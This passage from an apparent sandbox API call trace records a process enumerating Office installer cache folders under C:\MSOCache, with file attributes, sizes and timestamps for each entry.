ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0183.733] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.733] lstrlenW (lpString="Office32MUI.msi") returned 15 [0183.733] FindClose (in: hFindFile=0x6e9220 | out: hFindFile=0x6e9220) returned 1 [0183.734] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.734] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0183.734] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.734] lstrlenW (lpString="{90140000-0044-0409-1000-0000000FF1CE}-C") returned 40 [0183.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6e9220 [0183.736] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.737] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.737] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0183.737] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.737] lstrlenW (lpString="InfLR.cab") returned 9 [0183.737] FindClose (in: hFindFile=0x6e9220 | out: hFindFile=0x6e9220) returned 1 [0183.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.738] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0183.738] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.738] lstrlenW (lpString="{90140000-0054-0409-1000-0000000FF1CE}-C") returned 40 [0183.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6e9220 [0183.738] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.738] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.739] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0183.739] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.739] lstrlenW (lpString="Setup.xml") returned 9 [0183.739] FindClose (in: hFindFile=0x6e9220 | out: hFindFile=0x6e9220) returned 1 [0183.739] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.739] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0183.739] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.739] lstrlenW (lpString="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 40 [0183.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6e94e8 [0183.778] FindNextFileW (in: hFindFile=0x6e94e8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.778] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.778] FindNextFileW (in: hFindFile=0x6e94e8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0183.778] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.778] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0183.778] FindClose (in: hFindFile=0x6e94e8 | out: hFindFile=0x6e94e8) returned 1 [0183.779] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.779] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0183.779] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.779] lstrlenW (lpString="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 40 [0183.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6e94e8 [0183.855] FindNextFileW (in: hFindFile=0x6e94e8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.856] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.856] FindNextFileW (in: hFindFile=0x6e94e8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0183.856] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.856] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0183.856] FindClose (in: hFindFile=0x6e94e8 | out: hFindFile=0x6e94e8) returned 1 [0183.857] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.857] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0183.857] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.857] lstrlenW (lpString="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 40 [0183.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6ebca0 [0183.883] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.883] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.883] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0183.883] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.883] lstrlenW (lpString="GrooveLR.cab") returned 12 [0183.884] FindClose (in: hFindFile=0x6ebca0 | out: hFindFile=0x6ebca0) returned 1 [0183.885] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.885] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0183.885] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.885] lstrlenW (lpString="{90140000-0115-0409-1000-0000000FF1CE}-C") returned 40 [0183.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6ebca0 [0183.892] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.893] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.893] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="1033", cAlternateFileName="")) returned 1 [0183.893] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.893] lstrlenW (lpString="1033") returned 4 [0183.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x6ec680 | out: lpFindFileData=0x6ec680*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebce0 [0183.975] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ec680 | out: lpFindFileData=0x6ec680*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.975] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.976] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ec680 | out: lpFindFileData=0x6ec680*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0183.976] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.976] lstrlenW (lpString="dwintl20.dll") returned 12 [0183.976] FindClose (in: hFindFile=0x6ebce0 | out: hFindFile=0x6ebce0) returned 1 [0183.976] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec680 | out: hHeap=0x6b0000) returned 1 [0183.976] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0183.976] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.976] lstrlenW (lpString="branding.xml") returned 12 [0183.977] FindClose (in: hFindFile=0x6ebca0 | out: hFindFile=0x6ebca0) returned 1 [0183.977] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.977] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0183.977] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.977] lstrlenW (lpString="{90140000-0117-0409-1000-0000000FF1CE}-C") returned 40 [0183.977] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName=".", cAlternateFileName="")) returned 0x6eeab0 [0184.014] FindNextFileW (in: hFindFile=0x6eeab0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="..", cAlternateFileName="")) returned 1 [0184.014] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.014] FindNextFileW (in: hFindFile=0x6eeab0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005c, dwReserved1=0x5c003f, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0184.014] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.014] lstrlenW (lpString="Access.en-us") returned 12 [0184.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x6ef298 | out: lpFindFileData=0x6ef298*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdcd4a8fd, dwReserved1=0x66250efd, cFileName=".", cAlternateFileName="")) returned 0x6eeaf0 [0184.071] FindNextFileW (in: hFindFile=0x6eeaf0, lpFindFileData=0x6ef298 | out: lpFindFileData=0x6ef298*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdcd4a8fd, dwReserved1=0x66250efd, cFileName="..", cAlternateFileName="")) returned 1 [0184.071] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.071] FindNextFileW (in: hFindFile=0x6eeaf0, lpFindFileData=0x6ef298 | out: lpFindFileData=0x6ef298*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0xdcd4a8fd, dwReserved1=0x66250efd, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0184.071] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.072] lstrlenW (lpString="AccessMUI.msi") returned 13 [0184.072] FindClose (in: hFindFile=0x6eeaf0 | out: hFindFile=0x6eeaf0) returned 1 [0184.073] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0184.073] FindNextFileW (in: hFindFile=0x6eeab0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2020, 